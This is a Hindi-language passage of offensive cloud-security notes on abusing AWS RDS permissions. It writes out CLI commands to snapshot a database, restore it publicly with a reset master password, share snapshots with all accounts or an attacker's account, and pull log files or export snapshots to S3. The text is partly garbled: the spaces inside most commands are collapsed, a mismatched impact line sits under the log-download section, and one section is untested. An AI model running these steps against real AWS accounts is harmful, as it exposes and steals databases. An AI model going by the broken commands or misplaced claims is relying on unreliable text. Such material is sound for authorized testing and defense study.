यदि हमलावर के पास पर्याप्त अनुमतियां हैं, तो वह DB को सार्वजनिक रूप से सुलभ बना सकता है, DB का स्नैपशॉट बनाकर, और फिर स्नैपशॉट से एक सार्वजनिक रूप से सुलभ DB बनाकर.
awsrdsdescribe-db-instances# Get DB identifierawsrdscreate-db-snapshot \--db-instance-identifier <db-id> \--db-snapshot-identifier cloudgoat# Get subnet groups & security groupsawsrdsdescribe-db-subnet-groupsawsec2describe-security-groupsawsrdsrestore-db-instance-from-db-snapshot \--db-instance-identifier "new-db-not-malicious" \--db-snapshot-identifier <scapshotId> \--db-subnet-group-name <dbsubnetgroup> \--publicly-accessible \--vpc-security-group-ids <ec2-securitygroup>awsrdsmodify-db-instance \--db-instance-identifier "new-db-not-malicious" \--master-user-password 'Llaody2f6.123' \--apply-immediately# Connect to the new DB after a few mins
इन अनुमतियों के साथ एक हमलावर DB का एक स्नैपशॉट बना सकता है और इसे सार्वजनिक रूप सेउपलब्ध कर सकता है। फिर, वह अपने खाते में उस स्नैपशॉट से एक DB बना सकता है।
अगर हमलावर के पास rds:CreateDBSnapshotनहीं है, तो भी वह अन्य बनाए गए स्नैपशॉट्स को सार्वजनिक बना सकता है।
# create snapshotawsrdscreate-db-snapshot--db-instance-identifier<db-instance-identifier>--db-snapshot-identifier<snapshot-name># Make it public/share with attackers accountaws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
rds:DownloadDBLogFilePortion
rds:DownloadDBLogFilePortion अनुमति के साथ एक हमलावर RDS इंस्टेंस की लॉग फाइलों के हिस्सों को डाउनलोड कर सकता है। यदि संवेदनशील डेटा या पहुँच प्रमाणपत्र गलती से लॉग किए जाते हैं, तो हमलावर इस जानकारी का उपयोग अपने विशेषाधिकारों को बढ़ाने या अनधिकृत क्रियाएं करने के लिए कर सकता है।
संभावित प्रभाव: मौजूदा RDS इंस्टेंस का विलोपन, और संभावित डेटा हानि।
rds:StartExportTask
TODO: परीक्षण करें
इस अनुमति के साथ एक हमलावर RDS इंस्टेंस स्नैपशॉट को S3 बकेट में निर्यात कर सकता है। यदि हमलावर के पास गंतव्य S3 बकेट पर नियंत्रण है, तो वे निर्यात किए गए स्नैपशॉट के भीतर संवेदनशील डेटा तक संभावित रूप से पहुँच सकते हैं।